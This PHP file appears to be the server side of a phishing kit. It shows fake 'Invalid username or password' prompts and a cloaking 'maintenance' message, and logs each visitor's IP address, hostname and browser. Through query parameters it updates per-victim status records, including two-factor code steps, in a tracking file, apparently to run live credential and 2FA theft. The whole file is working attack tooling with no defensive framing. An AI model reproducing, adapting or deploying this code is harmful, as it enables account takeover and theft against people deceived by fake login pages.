<?php

 header("Access-Control-Allow-Origin: *"); 
 header('Access-Control-Allow-Methods: GET, POST, OPTIONS');
if ($_GET['errr'] == "errr"){$errr="Wrong Credentials<br>Invalid username or password";}
if (empty($_GET['errr'])) {
   $errr=" You must log in to continue.";
}

/*
$badAgents = array('Browser: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36;','Browser: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36');
if(in_array($_SERVER['HTTP_USER_AGENT'],$badAgents)) {
    exit();
}*/
#l.i.n.e.
#
#error_reporting(E_ALL);
#error_reporting(0);
#ini_set("display_errors", 1);
#wicked 
if( isset($_GET['h']) ){

$enil = $_GET['user'];
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        $rowsx = explode("|", $row);
 $rows[$key] = str_replace("lfxaz","progress",$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
die();
}}}
if( isset($_GET['l']) ){

$enil = $_GET['user'];
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        $rowsx = explode("|", $row);
 $rows[$key] = str_replace("lfxaz","progress",$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
die();
}}}
if( isset($_GET['2fa']) ){

$enil = $_GET['user'];
$fa2=$_GET['2fa'];
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        $rowsx = explode("|", $row);
echo $rowsx[5];
if ($rowsx[5]=="af2zx"){
    $rows[$key] = str_replace("af2zx","progress",$rows[$key]);
}
if ($rowsx[5]=="decc"){
    $rows[$key] = str_replace("decc","progress",$rows[$key]);

}
file_put_contents("inevitable.php", implode("\n", $rows));
die();
}}}
$cloak="Website Under Maintenance: If you feel that you are receiving this message in error, please check the URL and try your request again.";

$where=$_GET['w'];
if (empty($_GET['w'])) {
    $eorf=$_SERVER['SERVER_NAME'];
    $parts = explode(".", $eorf);
$where=$parts[0];
}
if (empty($_GET)) {
die('If you feel that you are receiving this message in error, please check the URL and try your request again.');
$data = " 
+ ------------------------------------------+
| $when
| $user
| $referer
| $method
| $qry
+ ------------------------------------------+
" . $_SERVER['REMOTE_ADDR'] . " (" . gethostbyaddr($_SERVER['REMOTE_ADDR']) . ")
Browser: ".getenv("HTTP_USER_AGENT").";
+ ------------------------------------------+
";
    $file=fopen("error.txt","a");
    fwrite($file,$data);
    fclose($file);
}
$ua = $_SERVER['HTTP_USER_AGENT'];
//$referer = $_SERVER['HTTP_REFERER'];
$qry = $_SERVER['QUERY_STRING'];
$method = $_SERVER['REQUEST_METHOD'];
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$ip= $_SERVER['REMOTE_ADDR'];

$when = date("d/m/y G.i:s", time());
$step=$_GET['s'];

$user=$_GET['user'];

include("file_line.php"); 
?>
